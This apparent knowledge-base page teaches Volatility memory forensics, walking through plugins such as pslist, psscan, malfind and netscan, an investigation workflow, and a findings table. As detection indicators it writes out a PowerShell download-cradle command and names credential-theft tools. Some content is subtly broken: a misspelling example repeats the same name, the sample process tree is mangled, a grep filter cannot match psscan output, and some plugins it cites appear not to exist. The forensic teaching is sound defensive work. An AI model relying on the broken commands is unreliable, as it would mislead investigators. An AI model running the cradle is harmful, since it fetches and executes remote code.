Tools

T1003, T1055

Volatility

How Volatility performs memory forensics on Windows, Linux, and macOS RAM dumps -- process analysis, malware extraction, hook detection, and timeline reconstruction.

View on Graph

What Volatility Is and Why Memory Forensics Matters

  • Volatility is an open-source memory forensics framework that analyzes RAM dumps (memory images) to reconstruct what was happening on a system at the moment the dump was captured.
  • Unlike disk forensics, which analyzes files that persist on storage, memory forensics captures the running state of the OS: processes, network connections, loaded drivers, registry keys in memory, injected code, and kernel data structures.
  • Malware that never writes to disk — reflective DLL injection, process hollowing, memory-only rootkits, and fileless PowerShell attacks — leaves no artifact on the hard drive but is fully visible in RAM.
  • Volatility is the tool that finds it. Pair with YARA rules for automated detection of known malware in memory dumps.

Essential Plugins — Process Analysis

pslist — List Running Processes

volatility -f memory.dmp windows.pslist

Shows every active process at the time of the dump. Differentiates between processes running in the current context and those in other sessions.

What to look for:

  • Processes with unusual names (misspellings: scvhost.exe instead of svchost.exe, explorer.exe instead of explorer.exe, winlogon.exe with extra characters)
  • Processes running from unexpected parent directories (e.g., svchost.exe from C:\Users\Public\ instead of C:\Windows\System32\)
  • Multiple instances of processes that normally run once (e.g., two instances of lsass.exe or winlogon.exe)

psscan — Find Hidden Processes

volatility -f memory.dmp windows.psscan

Scans physical memory for process structures, catching processes hidden by kernel rootkits. pslist lists processes from the linked list maintained by the OS; psscan scans raw memory for EPROCESS structures regardless of whether they appear in the linked list.

What to look for: Processes that appear in psscan output but not in pslist output. These are processes that have been hidden — a strong rootkit indicator.

pstree — Process Tree

volatility -f memory.dmp windows.pstree

Shows parent-child relationships. A legitimate process tree looks like:

...svchost.exe (PID: 1000)
    └── spoolsv.exe (PID: 1200)   [printing — expected]
    0: explorer.exe (PID: 2000)
        └── notepad.exe (PID: 2200)   [user opened notepad

What to look for:

  • winword.exe spawning powershell.exe — macro execution
  • outlook.exe spawning cmd.exe — email-initiated compromise
  • svchost.exe spawning rundll32.exe — service launching code execution
  • explorer.exe spawning regsvr32.exe — user clicked a file that registered a COM component
  • Any process spawning net.exe, nslookup.exe, whoami.exe — post-exploration commands

dlllist — List Loaded DLLs

volatility -f memory.dmp windows.dlllist --pid <PID>

Shows all DLLs loaded by a specific process.

What to look for:

  • DLLs loaded from %TEMP%, %APPDATA%, or user profile directories (legitimate DLLs live in C:\Windows\System32\ or C:\Program Files\)
  • DLLs that are not in the expected load order for the process
  • Missing DLL entries — a process that should load ws2_32.dll (network) but does not may be hiding its network activity
  • DLLs with mismatched company names — kernel32.dll should always be Microsoft-signed

Malware Extraction

cmdscan and consoles — Reconstruct Command History

volatility -f memory.dmp windows.cmdscan  (classic cmd.exe command history)
volatility -f memory.dmp windows.consoles (PowerShell console history)

What to look for:

  • Base64-encoded PowerShell commands
  • Download cradle URLs: IEX (New-Object Net.WebClient).DownloadString('http://...')
  • Reconnaissance commands: whoami, net user, net group "Domain Admins", ipconfig, route print
  • Lateral movement commands: psexec, wmic /node:, winrm, Enter-PSSession
  • Credential access: mimikatz, sekurlsa, lsadump, invoke-mimikatz

netscan — Network Connections

volatility -f memory.dmp windows.netscan

Shows all network connections (TCP and UDP) at the time of the dump, mapped to the owning process. Cross-reference with Wireshark PCAP analysis for full network context.

What to look for:

  • Outbound connections to known-bad IPs or suspicious ports
  • Processes making connections that should not have network access (e.g., notepad.exe connecting to an external IP)
  • Listening services on non-standard ports (4443, 8080, 1337)
  • DNS queries to unusual domains

malfind — Find Injected Code

volatility -f memory.dmp windows.malfind

Scans for memory regions with executable permissions that contain code injected into a process. This is the primary detection mechanism for reflective DLL injection, process hollowing, and shellcode injection.

What to look for:

  • Memory pages with PAGE_EXECUTE_READWRITE permissions (RWX) — extremely suspicious unless it is a JIT compiler
  • The MZ marker at the start of a memory region — a PE file (DLL or EXE) has been injected into the process
  • Shellcode patterns (NOP sleds, jump instructions, encoded payloads)
  • Memory regions flagged in malfind that do not correspond to any normally loaded module

ldrmodules — Hidden DLL Detection

volatility -f memory.dmp windows.ldrmodules

Cross-references DLLs across three sources: the Process Environment Block (PEB), the VAD tree, and memory-mapped files. A DLL that is present in only one or two of these lists is likely hidden.

What to look for: DLLs that are missing from the PEB list but present in the VAD tree — the attacker removed the DLL from the PEB to hide it from enumeration tools, but the VAD (maintained by the kernel) still has the mapping.

Memory Forensics Investigation Workflow

Step 1 — Profile Identification

volatility -f memory.dmp windows.info

Identifies the OS version, kernel version, and architecture. This is required before any analysis.

Step 2 — Process Analysis

# Get a process tree
volatility -f memory.dmp windows.pstree

# Check for hidden processes
volatility -f memory.dmp windows.psscan | grep -i "not found in pslist"

# Check loaded DLLs for suspicious processes
volatility -f memory.dmp windows.dlllist --pid <SUSPICIOUS_PID>

Step 3 — Network Evidence

# Extract network connections
volatility -f memory.dmp windows.netscan

Step 4 — Code Injection Detection

# Find injected code
volatility -f memory.dmp windows.malfind

# Find hidden or injected DLLs
volatility -f memory.dmp windows.ldrmodules --pid <SUSPICIOUS_PID>

Step 5 — Command History and Artifacts

# Reconstruct command history
volatility -f memory.dmp windows.cmdscan
volatility -f memory.dmp windows.consoles

# Extract command-line arguments for all processes
volatility -f memory.dmp windows.cmdline

# Check Windows event logs (if in memory)
volatility -f memory.dmp windows.evtxs

Step 6 — Timeline and Triage

# Build a timeline of system activity
volatility -f memory.dmp windows.timeliner

# Generate a summary of key findings
volatility -f memory.dmp windows.summary

Common Memory Forensics Findings

FindingPluginImplication
Process hidden from pslist but visible in psscanpslist vs psscanRootkit or DKOM (Direct Kernel Object Manipulation)
RWX memory region in non-JIT processmalfindProcess injection — likely shellcode or injected DLL
DLL missing from PEB but mapped in VADldrmodulesDLL hiding — attacker removed the DLL from the PEB to evade detection
PowerShell command with base64 decodeconsoles or cmdlinePost-exploitation — command-line logging already in place
Network connection to external IP from suspicious processnetscanC2 beaconing or data exfiltration
Unlinked EPROCESS structurepsscanSophisticated rootkit — attacker has removed the EPROCESS from the kernel’s linked list
MZ header in RWX memorymalfindComplete PE (DLL or EXE) was injected into process memory

Sources